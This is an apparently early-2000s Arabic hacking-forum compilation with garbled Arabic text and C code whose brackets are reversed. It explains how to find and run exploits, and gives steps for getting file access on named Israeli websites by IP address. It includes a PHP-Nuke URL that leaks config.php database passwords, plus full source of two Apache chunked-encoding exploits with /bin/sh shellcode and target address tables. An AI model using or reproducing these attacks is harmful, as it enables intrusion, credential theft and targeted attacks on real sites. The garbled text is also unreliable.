تريد الذي النظام مدير او االدمينيستراتور عنتوجد ... ما دايما االستثمارات اختراقه
ال بواسطه الدخول تستطيع يجعك معين ملف بصوره http بواسطه.. طبيعبه
نستخدم من .... scanner لذلك العديد جد يو االستثمار هذا عن لبحثمثل االستثمارات
BOF )buffer over flow( , DoS ) denial of service( , ال هجوم ال ان اؤمن ا انا فكره على اكسبلويت DoS و ... هي
عرضو مثل بعضاالوامر تنفيذ لك تتيح التي الثغرات ايضا يوجد والملفات على الكتايه و مسح
فهو .... فلو اوفر البوفر لموضوع بالنسبه غيرها و االكستينشنز مثكبير حد الى يشبه
و DoS ال المعلومات بفيضمن السيرفير ارباك على يعتمد حيثالرووت . يمنحك
ال هجوم ارسال DoS اما عن عباره السيرفير GET / POST فهو الال يؤدي مما
هو ) OVERLOAD حدوث اللي للسيرفير المركزيه المعالجه لوحدهيعمل جهاز عن عباره
السيرفير ( 24 يصبح و العمل عن الموقع فيتوقف ساعهOFFLINE ....
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
؟ 1 استثمارات تجد كيفعليك يجب فانه سيرفير في معينه ثغره تستثمر ان تستطيع لكي
السيرفير في موجوده الثغره ان تتاكد ان اوالطريقتين .. يوجد فانه معين فايل عن عباره االستثمار كان لما و
ال ام موجوده الثغره كانت اذا ما ..لمعرفهحاله في كما المتصفح خالل من مباشره التطبيق طريق عن اما
بيج الفرونت او اليونيكود مثل امتصفح بعضثغراتان .. المعروف من طبعا الموقع فحص في السكانرز تستخدم ان او
ال سكانرز لها المتصفح threads ثغراتال تسمى هي بها cgi scaners و ملفات له تضيف ان ممكن بعضها
جاهزا يكون البعضاالخر و .. ثغراتاحبذه ان و السكانرز من اخر نوع هناك shadow security scaner... و
<<<..... احدث بها تجد ان يمكن التي المواقع احسن من فكره على
هو على rootshell.com الثغرات يحتوي هو واو واحده كلمه عن عباره للبحث مفتاح تضع ان يكفي بحث محركمثل تحتوي red hat 7.2 كلمتان التي الثغرات من العديد تجد سوف و
علىred hat 7.2 ......
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
؟؟ 2 الثغرات هذه تستغل كيفبسكانر موقع يفحصون الناسعندما من ( الكثير ال خاصه shadow و
ايشيسوون .. ) يعرفون ال معينه استثمارات لهم يطلع وكذا؟؟؟؟ ...بعد
حتالقي الشادو بتستعمل انت ده .. url لو العنوان تزرو الثغره بجانبهناك تالقيها كلمه كل تقره .. و
اي تجد لم اذا و url او اثغره اسم تاخد يبقى االخرى السكانرز فيالموقع rootshell.com تروح
في الله شاء ان انت و الثغره اسم البحث محرك في تكتب %99و الثغره لهاي استثمار بتالقي الحاالت ..من
كده زي اشياء و تستخدمها كيف ....... و
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
االستثمارات 3 من مختلفه : انواععلى الرووت منحك هو هدفها يكون االستثمارات من الكثير طبعا
المدير .. هو رووت كلمه معنى السيرفيرال .. على قيود اي يوجد ال االدمين الرووت commands او اللي
السيرفير .. على الصالحيات كل لك اي يكتبهاالثغرات من العديد خالل من يتم ان يمكن الرووت على الحصول و
ال ثغرات ال , http مثل غيرها BOF و .. وصالحيه .. لك تعطي قد فهي الثغرات عمل طريقه على تعتمد كها
ايضا و الملفات عل الكتابه و حذف و قراءه
السيرفير الى ملفات .... رفعواضحه صوره في اما اليوزر اسم و السريه الكلمه لك تعطي قد او
الملف بمقياس config.inc مثل مشفره اوDES/MD5 ... الملف في اليونيكس .... etc/passwd/ كما انظمه ... في
ال هجوم كبير حد الى يشبه فهو فلو اوفر للبفر و DoS بالنسبهيسببه مثلما للسيرفير ضرر يسبب ال لكنه
ال عن DoSهجوم عباره البفر يكون االحيان اغلب في انه المهمباعطائك دائما تنتهي للسيرفير اوامر ارسال
من ... هائل لكم السيرفير استقبال بسبب هذا و الرووت صالحيهالسيرفير ارباك الى فيؤدي .. الداتا
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
خاللها 4 من الثغرات عن للبحث مفيده : مواقعالمواقع هذه في الجديده االستثمارات عن البحث : يمكنك
packetstorm.securify.com /.securityfocus.com /www.insecure.org www.rootshell.com/ المزيد تجد ابحثسوف غيرها و .
،،،انتهى
الثغرات " تستخدم
>منقول<>oOoDa BE$T :الكاتب<
:البداية
: .txt .. سورسكود على يحتوي اي الممكن من ملفنصي ملف ويعني
.. القراءة , اكمل البير بالسي المكتوبة البرامج او الثغرات لبعضاستخدامها كيفية ..لتعرف
: .c .. كتابتها يتم الثغرات واغلب فقط سورسكود لكنه سي برنامج هو
يفترضعليك.. هذا بالسيعمل ثم تحميله _ )compile( عليك السورسكود تحويل يعني وهذا ... _) يمكن ) لن انه هنا المشكلة لكن بتشغيله تثوم ثم برنامج لملف .. عندك يكون ان فيجب ويندوز بيئة تحت Shell او Linux تشغيلها
Account ..اكتب ثم المفل به الموجود للمسار توجه التحميل :بعض
gcc filenmae.c ----> الكومبايل امرالملف :سينتج
a.out ---> الناتج البرنامج ..وهو
ينقصك؟؟ ماذا واالنعليه تطبق ان تريد الذي الموقع اسم او بي اي معك يكون ان يجب
..الثغرة
:كمثال./a.out xxx.xxx.xxx.xxx
بالبيرل المكتوبة :للثغرات
: .pl .. تحتاج ايضا لتشغيله بيرل Shell Account او Linux برنامج
كان اكتب exploit اذا موقع على تطبقه ان :واردتperl filename.pl xxx.xxx.xxx.xxx
او./filename xxx.xxx.xxx.xxx
،،،انتهى
الثغرة " هذه مع اإلسرائيلية المواقع بإختراق " تمتع
> الحزم شبكة منتديات من >منقول>DeadLine :الكاتب<
: الشرحسيرفرات على تطبق أخوان يا الثغره : اوال
Microsoft-IIS/5.0 on Windows 2000
وندوز لنا يقدمها بسيطه اداه هي مانحتاجه كل أخوان ال 98يا وانني النني ال ام لخاصيه هذه مثل تمتلك االخرى النسخ كانت ان اعلم
ووندوز لينكسماندريك فقط نظامين على فقط 98اعمل :
هي Web Folders : االداه
الثغره هذه نجد : اينالتاليه الخطوات في انشاءلله نجدها سوف : حسنا
على My Computer ادخل
داخل بل آخر شيء او السي ليسداخل هناك ستجدها My ثمComputer آخره الى والدي السي مع هي تكون يعني فقط
المسمى الملف أخون يا Web Folders نفتح
اآلتي سنجد : ثم
Add Web Folder لالختراق المهمه اداتنا ستكون التي هي حيث
ال : Add Web Folder نفتح
كلمة نجد Type the location to add حيث
اآلتي بأدخال نقوم مستطيل تحتها : ونرى
http://hostname.com/ان وليس hostname حيث الموقع ايبي قلنا انتبه الموقع ايبي هو
االسمدروسكثيره وهناك الموقع تبع االيبي يخرج كيف يعرف والجميع
الموضوع بخصوصهذا
موحد ايبي على تعمل انها حيث للتطيبق اسرائيليه مواقع : وهذهmail.talcar.co.il
daihatsu-israel.co.ildaewoo-israel.co.il
ذكره تم الذي بالمستطيل : ندخلhttp://192.117.143.121/
كلمة على نضغط Next : ثم
خاصية وتعطيك الموقع ملفات بتحميل االداه تعمل سوف وهناالملفات وازالة تحميل وهي االدمن
كلمة لك تظهر التحميل من البرنامج ينتهي ان finish : فبعد
ال الى تذهب ومسمى Web Folder : عندها هناك الموقع ملف وتجدالموقع ايبي تحت
للتطبيق اخر : موقع
http://www.israwine.co.il/ 212.199.43.84
الثغره : ان فأعرف نيم ويوزر باسوورد ادخال طلب تم اذا مالحظه مغلقه
مغلقه الثغره ان فمعناه ملف اي تجد ولم الملفات الى دخلت اذا او ايضا
امين اللهم امين اللهم والعافيه التوفيق الله .اسئل،،،انتهى
نيوك ".27 " ثغرة
>منقول<<Arab VireruZ :الكاتب<
باألنقليزية : الشرح
twlc: here your 0day from LucisFero and supergatePosted on Monday, September 24 @ 14:25:58 CDT
topic: advisories twlc security divison
24/09/2001
Php nuke BUGGED.
Found by:LucisFero and supergate
./twlc
SummaryThis time the bug is really dangerous...it allows you to 'cp' any file
on the box... or even upload files...
Systems Affectedall the versions ARE vulnerable
except '5.0 RC1' )i wonder why a released c. is ok while the final 5.2 is bugged(
ExplanationDo you need sql password?
http://www.server.net/admin.php?uplo...ame=hacked.txt
the admin 'login' page will be prompted just go to http://www.server.net/images/hacked.txt and you will see
config.php that as everyone knows contain the sql's passwords, you can even upload files...i leave you the 'fun' to find all the ways
to use it... and try to dont be a SCRIPT KIDDIE we wrote this advisory to help who runs php nuke and NOT TO LET YOU HAVE
FUN.
let me explain you the bug... admin.php contains this routine: $basedir = dirname)$SCRIPT_FILENAME(;
$textrows = 20;$textcols = 85;
$udir = dirname)$PHP_SELF(;if)!$wdir( $wdir="/";
if)$cancel( $op="FileManager";if)$upload( {
copy)$userfile,$basedir.$wdir.$userfile_name(; $lastaction = ""._UPLOADED." $userfile_name --< $wdir";
// This need a rewrite -------------------------------------< OMG! WE TOTALY AGREEEEEEEE lmao
//include)"header.php"(;//GraphicAdmin)$hlpfile(;
//html_header)(;
//displaydir)(;$wdir2="/";
chdir)$basedir . $wdir2(;//CloseTable)(;
//include)"footer.php"(;Header)"Location: admin.php?op=FileManager"(;
exit;}
that doesnt do a check to see if you are logged as admin or no... so you can use it anyway...
Solutionwe erased the function... cause we wanted to re**** the file
manager anyway but i suggest you to do the same... -to upload files use FTP-
conclusions:yet another bug of php nuke... this software is used by thousands
of people... )we run something based on it too( i hope that this time the author will reply soon and will release a patch too! as i
said before just dont try to be a script kiddie or we simply WONT post anymore this kind of advisories. Prolly the funny thing is that who first discovered the bug was LucisFero that... 2 hours before didnt knew php ... so i )supergate( fear him and you should too.
posted at:http://www.twlc.net article http://www.twlc.net/article.php?sid=421
[email protected]://www.phpnuke.org -good luck-
http://sourceforge.net/tracker/?group_id=7511 Project: PHP-Nuke Web Portal System
and of course mailed to the author of php nuke
contacts )bugs, ideas, insults, cool girls... remember that trojans are directed to /dev/null(:
[email protected]@twlc.net
http://www.twlc.net )yes we are patched(
peace out pimps. bella a tutti.
eof
=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
البرمجي :الخطأ
$basedir = dirname)$SCRIPT_FILENAME(;$textrows = 20;$textcols = 85;
$udir = dirname)$PHP_SELF(;if)!$wdir( $wdir="/";
if)$cancel( $op="FileManager";if)$upload( {
copy)$userfile,$basedir.$wdir.$userfile_name(; $lastaction = ""._UPLOADED." $userfile_name --< $wdir";
// This need a rewrite -------------------------------------< OMG! WE TOTALY AGREEEEEEEE lmao
//include)"header.php"(;//GraphicAdmin)$hlpfile(;
//html_header)(;//displaydir)(;$wdir2="/";
chdir)$basedir . $wdir2(;//CloseTable)(;
//include)"footer.php"(;Header)"Location: admin.php?op=FileManager"(;
exit;}
=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
:الثغرة
http://www.server.net/admin.php?uplo...ame=hacked.txt
=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
التعديل بعد الثغرة
http://www.server.net/admin.php?uplo...=ultramode.txt
=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
الثغرة :عمل
-= الكونفيج ملف النصي config.php طبع الملف الىالملف ultramode.txtالموجود لطبع نصي ملف تحميل تحتاج لن
بعض :-( وألن واستنتج فكر يعني األنقليزي بالشرح موجود هو كماالدخول سوى عليك ما اآلن الموقع الى التحميل تمنع المواقع
http://server.com/ultramode.txtالىالموقع بيانات لقاعدة التابع باسواليوزر -=وستجد
مالحظاتاختراقه server.com بدل -1 الراد بالموقع
مثال -2 المجلة موقع من http://server.com/nuke : تأكد
اصدار -3 مع تعمل ال الثغرة البعض 5.2هذه يظن كما .
،،،انتهى
" Chunked ثغرة "
> موقع من >angels-bytes منقول
تسمى بثغره سمع ، Apache لـ Chunked كلنا تحدث لعدم السبباآلن angels-bytes موقع ، الموقع إنطالق قبل أتت أنها هو عنها، Retina Apache Chunked Scanner سأضع بفحص تقوم أداة وهي
من الثغره 254نطاق بهذه مصاب منها ما لك وتظهر ، بي آي عنوان .
أباتشي بتنزيل فأنصحك وجودها عند الثغره هذه معالجة أردت إذااآلن 2.0.39 الى األفضل فهو
التنزيل وصلة هي هذهhttp://www.apache.org/dist/httpd/binaries
أستثمارين أفضل لكم أضع فسوف الثغره هذه إستثمار لمسألة أما
أباتشي في إلى 1.3.24الخطأ من 2واعلى 2.0.36إلى 2و -dev ، الخطأ رسائل مع يتعامل الذي البرمجي الروتين في وهي
لتسببطفح بعيد مهاجم قبل من تستخدمان اإلستثماران هذانفي كتابه إعادة إلى بذلك مؤديه ، المصاب السيرفر في محلي
كود لتنفيذ تسمح ما وبطريقة ، الذاكرة
قبل ((*/ من وإختبارها تجريبها تم وضعها angels-bytes.com قد قبلهنا )) لكم*/
/* تيم سيكورتي من عليها /*حصلنا#include #include #include #include #include #include #include #include #include #include #include
#define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it failed */
#define RET_ADDR_INC 512
#define MEMCPY_s1_OWADDR_DELTA -146#define PADSIZE_1 4#define PADSIZE_2 5#define PADSIZE_3 7
#define REP_POPULATOR 24#define REP_RET_ADDR 6
#define REP_ZERO 36#define REP_SHELLCODE 24
#define NOPCOUNT 1024
#define NOP 0x41#define PADDING_1 \\'A\\'#define PADDING_2 \\'B\\'#define PADDING_3 \\'C\\'
#define PUT_STRING)s( memcpy)p, s, strlen)s((; p += strlen)s(;#define PUT_BYTES)n, b( memset)p, b, n(; p += n;
#define SHELLCODE_LOCALPORT_OFF 30
char shellcode[] =\\\" \\\\x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x10\
\\\x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\xb8\\\\x1f\\\"
\\\" \\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x7a\\\\x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x7a\\
\\x02\\\"\\\" \\\\x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x90\
\\\xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x24\\\\x04\\\"
\\\" \\\\x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\xc7\\\\x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x00\\
\\xb8\\\"\\\" \\\\x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\xff\
\\\x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x08\\\\x03\\\"
\\\" \\\\x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x0b\\\\x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x01\\
\\x89\\\"\\\" \\\\xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x6a\
\\\x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\"
\\\" \\\\x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x2f\
\\\x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\xc0\\\\x50\\\"
\\\" \\\\x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x50\\\\xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\
\\xcc\\\";
struct {char *type;
u_long retaddr;} targets[] = { // hehe, yes theo, that say OpenBSD here!
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.20\\\", 0xcf92f },{ \\\"OpenBSD 3.0 x86 / Apache 1.3.22\\\", 0x8f0aa },{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24\\\", 0x90600 },{ \\\"OpenBSD 3.1 x86 / Apache 1.3.20\\\", 0x8f2a6 },{ \\\"OpenBSD 3.1 x86 / Apache 1.3.23\\\", 0x90600 },{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24\\\", 0x9011a },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", 0x932ae },};
int main)int argc, char *argv[]( {
char *hostp, *portp;unsigned char buf[512], *expbuf, *p;
int i, j, lport;int sock;
int bruteforce, owned, progress;u_long retaddr;
struct sockaddr_in sin, from;
if)argc != 3( {printf)\\\"Usage: %s \\\\n\\\", argv[0](;
printf)\\\" Using targets:\\\\t./apache-scalp 3 127.0.0.1:8080\\\\n\\\"(;printf)\\\" Using bruteforce:\\\\t./apache-scalp 0x8f000
127.0.0.1:8080\\\\n\\\"(;printf)\\\"\\\\n--- --- - Potential targets list - --- ----\\\\n\\\"(;
printf)\\\"Target ID / Target specification\\\\n\\\"(;for)i = 0; i > sizeof)targets(/8; i++(
printf)\\\"\\\\t%d / %s\\\\n\\\", i, targets[i].type(;
return -1;}
hostp = strtok)argv[2], \\\":\\\"(;if))portp = strtok)NULL, \\\":\\\"(( == NULL(
portp = \\\"80\\\";
retaddr = strtoul)argv[1], NULL, 16(;if)retaddr > sizeof)targets(/8( {
retaddr = targets[retaddr].retaddr;bruteforce = 0;
}else
bruteforce = 1;
srand)getpid)((;signal)SIGPIPE, SIG_IGN(;
for)owned = 0, progress = 0;;retaddr += RET_ADDR_INC( {
/* skip invalid return adresses */i = retaddr & 0xff;
if)i == 0x0a || i == 0x0d(retaddr++;
else if)memchr)&retaddr, 0x0a, 4( || memchr)&retaddr, 0x0d, 4((continue;
sock = socket)AF_INET, SOCK_STREAM, 0(;sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr)hostp(;sin.sin_port = htons)atoi)portp((;
if)!progress(printf)\\\"\\\\n[*] Connecting.. \\\"(;
fflush)stdout(;if)connect)sock, )struct sockaddr *( & sin, sizeof)sin(( != 0( {
perror)\\\"connect)(\\\"(;exit)1(;
}
if)!progress(printf)\\\"connected!\\\\n\\\"(;
/* Setup the local port in our shellcode */i = sizeof)from(;
if)getsockname)sock, )struct sockaddr *( & from, &i( != 0( {perror)\\\"getsockname)(\\\"(;
exit)1(;}
lport = ntohs)from.sin_port(;shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff;shellcode[SHELLCODE_LOCALPORT_OFF + 0] = )lport << 8( &
0xff;
p = expbuf = malloc)8192 + ))PADSIZE_3 + NOPCOUNT + 1024( * REP_SHELLCODE(
+ ))PADSIZE_1 + )REP_RET_ADDR * 4( + REP_ZERO + 1024( * REP_POPULATOR((;
PUT_STRING)\\\"GET / HTTP/1.1\\\\r\\\\nHost: apache-scalp.c\\\\r\\\\n\\\"(;
for )i = 0; i > REP_SHELLCODE; i++( {PUT_STRING)\\\"X-\\\"(;
PUT_BYTES)PADSIZE_3, PADDING_3(;PUT_STRING)\\\": \\\"(;
PUT_BYTES)NOPCOUNT, NOP(;memcpy)p, shellcode, sizeof)shellcode( - 1(;
p += sizeof)shellcode( - 1;PUT_STRING)\\\"\\\\r\\\\n\\\"(;
}
for )i = 0; i > REP_POPULATOR; i++( {PUT_STRING)\\\"X-\\\"(;
PUT_BYTES)PADSIZE_1, PADDING_1(;PUT_STRING)\\\": \\\"(;
for )j = 0; j > REP_RET_ADDR; j++( {*p++ = retaddr & 0xff;
*p++ = )retaddr << 8( & 0xff;*p++ = )retaddr << 16( & 0xff;*p++ = )retaddr << 24( & 0xff;
}
PUT_BYTES)REP_ZERO, 0(;PUT_STRING)\\\"\\\\r\\\\n\\\"(;
}
PUT_STRING)\\\"Transfer-Encoding: chunked\\\\r\\\\n\\\"(;snprintf)buf, sizeof)buf( - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", PADSIZE_2(;
PUT_STRING)buf(;PUT_BYTES)PADSIZE_2, PADDING_2(;
snprintf)buf, sizeof)buf( - 1, \\\"\\\\r\\\\n%x\\\\r\\\\n\\\", MEMCPY_s1_OWADDR_DELTA(;
PUT_STRING)buf(;
write)sock, expbuf, p - expbuf(;
progress++;if))progress%70( == 0(
progress = 1;
if)progress == 1( {memset)buf, 0, sizeof)buf((;
sprintf)buf, \\\"\\\\r[*] Currently using retaddr 0x%lx, length %u, localport %u\\\",
retaddr, )unsigned int()p - expbuf(, lport(;memset)buf + strlen)buf(, \\' \\', 74 - strlen)buf((;
puts)buf(;if)bruteforce(putchar)\\';\\'(;
}else
putchar))rand)(%2(? \\'P\\': \\'p\\'(;
fflush)stdout(;while )1( {fd_set fds;
int n;struct timeval tv;
tv.tv_sec = EXPLOIT_TIMEOUT;tv.tv_usec = 0;
FD_ZERO)&fds(;FD_SET)0, &fds(;
FD_SET)sock, &fds(;
memset)buf, 0, sizeof)buf((;if)select)sock + 1, &fds, NULL, NULL, &tv( < 0( {
if)FD_ISSET)sock, &fds(( {if))n = read)sock, buf, sizeof)buf( - 1(( >= 0(
break;
if)!owned && n <= 4 && memcmp)buf, \\\"\\\\nok\\\\n\\\", 4( == 0( {printf)\\\"\\\\nGOBBLE GOBBLE!@#%%(*#\\\\n\\\"(;
printf)\\\"retaddr 0x%lx did the trick!\\\\n\\\", retaddr(;sprintf)expbuf, \\\"uname -a;id;echo hehe, now use 0day OpenBSD
local kernel exploit to gain instant r00t\\\\n\\\"(;write)sock, expbuf, strlen)expbuf((;
owned++;}
write)1, buf, n(;}
if)FD_ISSET)0, &fds(( {if))n = read)0, buf, sizeof)buf( - 1(( > 0(
exit)1(;
write)sock, buf, n(;}}
if)!owned(break;
}
free)expbuf(;close)sock(;
if)owned(return 0;
if)!bruteforce( {fprintf)stderr, \\\"Ooops.. hehehe!\\\\n\\\"(;
return -1;}}
return 0;}
Exploit #2:#include #include #include #include #include #include #include #include #include #include #include
#ifdef __linux__#include
#endif
#define HOST_PARAM \\\"apache-nosejob.c\\\" /* The Host: field */#define DEFAULT_CMDZ \\\"uname -a;id;echo \\'hehe, now use
another bug/backdoor/feature )hi Theo!( to gain instant r00t\\';\\\\n\\\"
#define RET_ADDR_INC 512
#define PADSIZE_1 4#define PADSIZE_2 5#define PADSIZE_3 7
#define REP_POPULATOR 24
#define REP_SHELLCODE 24#define NOPCOUNT 1024
#define NOP 0x41#define PADDING_1 \\'A\\'#define PADDING_2 \\'B\\'#define PADDING_3 \\'C\\'
#define PUT_STRING)s( memcpy)p, s, strlen)s((; p += strlen)s(;#define PUT_BYTES)n, b( memset)p, b, n(; p += n;
char shellcode[] =\\\" \\\\x68\\\\x47\\\\x47\\\\x47\\\\x47\\\\x89\\\\xe3\
\\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xc6\\\\x04\\\\x24\\\"
\\\" \\\\x04\\\\x53\\\\x50\\\\x50\\\\x31\\\\xd2\\\\x31\\\\xc9\\\\xb1\\\\x80\\\\xc1\\\\xe1\\\\x18\\\\xd1\\
\\xea\\\\x31\\\"\\\" \\\\xc0\\\\xb0\\\\x85\\\\xcd\\\\x80\\\\x72\\\\x02\
\\\x09\\\\xca\\\\xff\\\\x44\\\\x24\\\\x04\\\\x80\\\\x7c\\\\x24\\\"
\\\" \\\\x04\\\\x20\\\\x75\\\\xe9\\\\x31\\\\xc0\\\\x89\\\\x44\\\\x24\\\\x04\\\\xc6\\\\x44\\\\x24\\\\x04\\
\\x20\\\\x89\\\"\\\" \\\\x64\\\\x24\\\\x08\\\\x89\\\\x44\\\\x24\\\\x0c\
\\\x89\\\\x44\\\\x24\\\\x10\\\\x89\\\\x44\\\\x24\\\\x14\\\\x89\\\"
\\\" \\\\x54\\\\x24\\\\x18\\\\x8b\\\\x54\\\\x24\\\\x18\\\\x89\\\\x14\\\\x24\\\\x31\\\\xc0\\\\xb0\\\\x5d\\
\\xcd\\\\x80\\\"\\\" \\\\x31\\\\xc9\\\\xd1\\\\x2c\\\\x24\\\\x73\\\\x27\
\\\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xff\\\\x04\\\\x24\\\"
\\\" \\\\x54\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\x51\\
\\x50\\\\xb0\\\"\\\" \\\\x1d\\\\xcd\\\\x80\\\\x58\\\\x58\\\\x58\\\\x58\
\\\x58\\\\x3c\\\\x4f\\\\x74\\\\x0b\\\\x58\\\\x58\\\\x41\\\\x80\\\"
\\\" \\\\xf9\\\\x20\\\\x75\\\\xce\\\\xeb\\\\xbd\\\\x90\\\\x31\\\\xc0\\\\x50\\\\x51\\\\x50\\\\x31\\\\xc0\\
\\xb0\\\\x5a\\\"\\\" \\\\xcd\\\\x80\\\\xff\\\\x44\\\\x24\\\\x08\\\\x80\
\\\x7c\\\\x24\\\\x08\\\\x03\\\\x75\\\\xef\\\\x31\\\\xc0\\\\x50\\\"
\\\" \\\\xc6\\\\x04\\\\x24\\\\x0b\\\\x80\\\\x34\\\\x24\\\\x01\\\\x68\\\\x42\\\\x4c\\\\x45\\\\x2a\\\\x68\\
\\x2a\\\\x47\\\"\\\" \\\\x4f\\\\x42\\\\x89\\\\xe3\\\\xb0\\\\x09\\\\x50\
\\\x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\x04\\
\\xcd\\\\x80\\\"\\\" \\\\x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x73\
\\\x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x89\\\\xe3\\\\x50\\\"
\\\" \\\\x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x50\\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc\\\";
;
struct {char *type; /* description for newbie penetrator */
int delta; /* delta thingie! */u_long retaddr; /* return address */
int repretaddr; /* we repeat retaddr thiz many times in the buffer */int repzero; /* and \\\\0\\'z this many times */
} targets[] = { // hehe, yes theo, that say OpenBSD here!{ \\\"FreeBSD 4.5 x86 / Apache/1.3.23 )Unix(\\\", -150, 0x80f3a00, 6,
36 },{ \\\"FreeBSD 4.5 x86 / Apache/1.3.23 )Unix(\\\", -150, 0x80a7975, 6,
36 },{ \\\"OpenBSD 3.0 x86 / Apache 1.3.20\\\", -146, 0xcfa00, 6, 36 },{ \\\"OpenBSD 3.0 x86 / Apache 1.3.22\\\", -146, 0x8f0aa, 6, 36 },{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24\\\", -146, 0x90600, 6, 36 },
{ \\\"OpenBSD 3.0 x86 / Apache 1.3.24 #2\\\", -146, 0x98a00, 6, 36 },{ \\\"OpenBSD 3.1 x86 / Apache 1.3.20\\\", -146, 0x8f2a6, 6, 36 },{ \\\"OpenBSD 3.1 x86 / Apache 1.3.23\\\", -146, 0x90600, 6, 36 },{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24\\\", -146, 0x9011a, 6, 36 },
{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", -146, 0x932ae, 6, 36 },{ \\\"OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1\\\", -146,
0x1d7a00, 6, 36 },{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.12 )Unix(\\\", -90, 0x80eda00, 5,
42 },{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.20 )Unix(\\\", -90, 0x80efa00, 5,
42 },{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.22 )Unix(\\\", -90, 0x80efa00, 5,
42 },{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.23 )Unix(\\\", -90, 0x80efa00, 5,
42 },{ \\\"NetBSD 1.5.2 x86 / Apache 1.3.24 )Unix(\\\", -90, 0x80efa00, 5,
42 },}, victim;
void usage)void( {int i;
printf)\\\"GOBBLES Security Labs\\\\t\\\\t\\\\t\\\\t\\\\t- apache-nosejob.c\\\\n\\\\n\\\"(;
printf)\\\"Usage: ./apache-nosejob >-switches< -h host[:80]\\\\n\\\"(;printf)\\\" -h host[:port]\\\\tHost to penetrate\\\\n\\\"(;
printf)\\\" -t #\\\\t\\\\t\\\\tTarget id.\\\\n\\\"(;printf)\\\" Bruteforcing options )all required, unless -o is used!(:\\\\
n\\\"(;printf)\\\" -o char\\\\t\\\\tDefault values for the following OSes\\\\
n\\\"(;printf)\\\" \\\\t\\\\t\\\\t)f(reebsd, )o(penbsd, )n(etbsd\\\\n\\\"(;
printf)\\\" -b 0x12345678\\\\t\\\\tBase address used for bruteforce\\\\n\\\"(;
printf)\\\" \\\\t\\\\t\\\\tTry 0x80000/obsd, 0x80a0000/fbsd, 0x080e0000/nbsd.\\\\n\\\"(;
printf)\\\" -d -nnn\\\\t\\\\tmemcpy)( delta between s1 and addr to overwrite\\\\n\\\"(;
printf)\\\" \\\\t\\\\t\\\\tTry -146/obsd, -150/fbsd, -90/nbsd.\\\\n\\\"(;printf)\\\" -z #\\\\t\\\\t\\\\tNumbers of time to repeat \\\\\\\\0 in the
buffer\\\\n\\\"(;printf)\\\" \\\\t\\\\t\\\\tTry 36 for openbsd/freebsd and 42 for netbsd\\\\
n\\\"(;printf)\\\" -r #\\\\t\\\\t\\\\tNumber of times to repeat retadd in the
buffer\\\\n\\\"(;printf)\\\" \\\\t\\\\t\\\\tTry 6 for openbsd/freebsd and 5 for netbsd\\\\
n\\\"(;printf)\\\" Optional stuff:\\\\n\\\"(;
printf)\\\" -w #\\\\t\\\\t\\\\tMaximum number of seconds to wait for shellcode reply\\\\n\\\"(;
printf)\\\" -c cmdz\\\\t\\\\tCommands to execute when our shellcode replies\\\\n\\\"(;
